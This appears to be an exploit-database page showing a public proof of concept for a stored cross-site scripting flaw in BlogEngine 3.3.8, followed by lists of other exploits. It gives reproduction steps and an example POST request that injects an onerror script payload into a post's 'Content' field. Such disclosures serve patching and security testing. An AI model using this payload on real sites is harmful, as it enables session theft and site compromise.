Search for hundreds of thousands of exploits

"BlogEngine 3.3.8 - 'Content' Stored XSS"

Author

Exploit author

"Andrey Stoykov"

Platform

Exploit platform

aspx

Release date

Exploit published date

2020-11-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# Exploit Title: BlogEngine 3.3.8 - 'Content' Stored XSS
# Date: 11/2020
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://blogengine.io/
# Software Link: https://github.com/BlogEngine/BlogEngine.NET/releases/download/v3.3.8.0/3380.zip
# Version: 3.3.8
# Tested on: Windows Server 2016
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/11/blogengine-338-stored-xss.html


Stored XSS Reproduction Steps:

1. Login http://IP/blogengine/admin/app/editor/editpost.cshtml
2. Add content and trap POST request into intercepting proxy
3. Add the XSS payload into the "Content" parameter value
4. Browse to the post to trigger the XSS payload


Example HTTP POST Request:
POST /blogengine/api/posts HTTP/1.1
Host: 192.168.56.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
[..]
{
  "Id": "",
  "Title": "XSS Test",
  "Author": "Admin",
  "Content": "<img src=x onerror=alert(`XSS`)>",
  [..]
  }

Example HTTP Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
[..]
{
  "IsChecked": false,
  "Id": "357ae13d-f230-486a-b2aa-71d67a700083",
  "Title": "XSS Test",
  "Author": "Admin",
  "Description": "",
  "Content": "<img src=x onerror=alert(`XSS`)>",
  [..]
 }
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
Release Date Title Type Platform Author
2020-11-06 "BlogEngine 3.3.8 - 'Content' Stored XSS" webapps aspx "Andrey Stoykov"
2020-08-17 "Microsoft SharePoint Server 2019 - Remote Code Execution" webapps aspx "West Shepherd"
2020-05-12 "Orchard Core RC1 - Persistent Cross-Site Scripting" webapps aspx SunCSR
2020-05-11 "Kartris 1.6 - Arbitrary File Upload" webapps aspx "Nhat Ha"
2020-02-24 "DotNetNuke 9.5 - File Upload Restrictions Bypass" webapps aspx "Sajjad Pourali"
2020-02-24 "DotNetNuke 9.5 - Persistent Cross-Site Scripting" webapps aspx "Sajjad Pourali"
2019-12-18 "Telerik UI - Remote Code Execution via Insecure Deserialization" webapps aspx "Bishop Fox"
2019-12-17 "NopCommerce 4.2.0 - Privilege Escalation" webapps aspx "Alessandro Magnosi"
2019-12-16 "Roxy Fileman 1.4.5 - Directory Traversal" webapps aspx "Patrik Lantz"
2019-11-12 "Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting" webapps aspx Cy83rl0gger
Release Date Title Type Platform Author
2020-11-06 "BlogEngine 3.3.8 - 'Content' Stored XSS" webapps aspx "Andrey Stoykov"
2020-05-04 "BoltWire 6.03 - Local File Inclusion" webapps php "Andrey Stoykov"
2020-03-02 "Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)" local windows "Andrey Stoykov"
2020-02-24 "ATutor 2.2.4 - 'id' SQL Injection" webapps php "Andrey Stoykov"
2019-07-15 "Streamripper 2.6 - 'Song Pattern' Buffer Overflow" local windows "Andrey Stoykov"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48999/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.